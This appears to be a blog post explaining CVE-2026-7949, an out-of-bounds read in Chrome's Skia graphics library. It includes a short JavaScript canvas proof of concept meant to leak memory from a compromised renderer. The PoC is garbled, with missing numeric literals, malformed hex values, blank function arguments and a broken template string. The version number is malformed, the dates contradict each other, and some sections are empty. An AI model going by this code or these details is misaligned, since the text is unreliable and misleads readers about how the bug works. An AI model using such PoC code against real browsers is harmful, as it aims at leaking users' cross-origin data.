CVE-2026-7949 - Out of Bounds Read in Skia Lets Attackers Leak Data in Chrome Extensions

On May 30, 2026, Google publicly disclosed CVE-2026-7949, a security bug affecting the Skia graphics library used in Google Chrome. This vulnerability could let a remote attacker, with access to the renderer process, read memory outside intended bounds. As a result, attackers could access confidential, cross-origin data via a malicious or compromised Chrome Extension. Chrome prior to version 148..7778.96 is affected.

In this post, I’ll walk you through what Skia is, how the bug works, and provide a simple exploit scenario, with code snippets and links for further reading. All of this is explained in simple terms, so you don’t need to be a security expert to follow along.

Severity: Medium (Chromium rating)

- CVE: CVE-2026-7949

What is Skia?

Skia is an open-source 2D graphics library that Chrome (and other projects) use to draw everything you see on the screen, from text and images to shapes and UI elements. When you visit a website or use a Chrome Extension that manipulates pixel data (for example, using <canvas> or <img> tags), Skia is often behind the scenes doing the work.

How Does the Bug Work?

The root of CVE-2026-7949 is an out of bounds (OOB) read in Skia. That means Skia would sometimes read memory that it shouldn’t—outside the boundaries of the current buffer. If attackers can control what’s being rendered (such as through a Chrome Extension or compromised renderer), they might trigger Skia into exposing memory it’s not supposed to.

This memory could contain sensitive information—perhaps from another web page or a secret in another Chrome Extension, thus leaking cross-origin data.

Exploit Scenario

Imagine a Chrome Extension that renders user-supplied images to a canvas element using Skia. If an attacker can inject a specially crafted image and trick Skia into reading past the end of the image buffer, parts of Chrome’s memory from other origins or extensions may leak into the canvas, where malicious JS can read it.

For this bug to be exploitable, the attacker already needs to have compromised the renderer process (for example, via another vulnerability, like a JavaScript engine bug).

Sample PoC Code Snippet

Below is a simplified proof of concept (for educational purposes only) showing how an attacker might attempt to trigger the vulnerability:

// Only possible after compromising the renderer process!
const canvas = document.createElement('canvas');
canvas.width = 1024;
canvas.height = 1024;

// Attacker-controlled image data (crafted to overflow buffer)
let attackerData = new Uint8ClampedArray(1024 * 1024 * 4 + 64);
for (let i = ; i < attackerData.length; i++) {
  attackerData[i] = x41; // 'A'
}

// "Leaky" code: passing in more data than expected
let ctx = canvas.getContext('2d');
let imgData = new ImageData(
  attackerData, 
  canvas.width + 8, // overflow width, may trigger OOB
  canvas.height
);
ctx.putImageData(imgData, , );

// Reading canvas pixels, possibly leaking memory
let leaked = ctx.getImageData(, , canvas.width + 8, 1).data;

// Examine leaked data for secrets
for (let i = ; i < leaked.length; i++) {
  if (leaked[i] !== x41) {
    console.log(Possible leaked byte: ${leaked[i]} at ${i});
  }
}

Actual exploitation depends on understanding Skia’s internal memory arrangements.

- Chrome’s renderer sandbox normally prevents extensions from directly reading cross-origin data. This bug only works if the environment is already compromised.

Official Fix

Google patched the vulnerability in Chrome version 148..7778.96. The release notes recommend updating ASAP.

How to Update Chrome:

More Info and References

- Chromium Issue Tracker
- Chrome Releases Blog
- NVD Entry for CVE-2026-7949
- Skia GitHub
- Understanding Out-of-Bounds Reads

Conclusion

Although CVE-2026-7949 is only rated "Medium," its real-world impact can be significant if chained with other vulnerabilities, especially for users who install many Chrome Extensions. This Skia bug reminds us that even small, hidden routines in large software projects can expose sensitive data.

Recommendations:

Stay safe online!

*This post is for educational, defensive purposes only. Do not attempt to exploit or abuse this vulnerability. If you find a real exploit in the wild, report it to Google’s security team right away.*

Timeline

Published on: 05/06/2026 18:12:48 UTC
Last modified on: 05/07/2026 02:07:45 UTC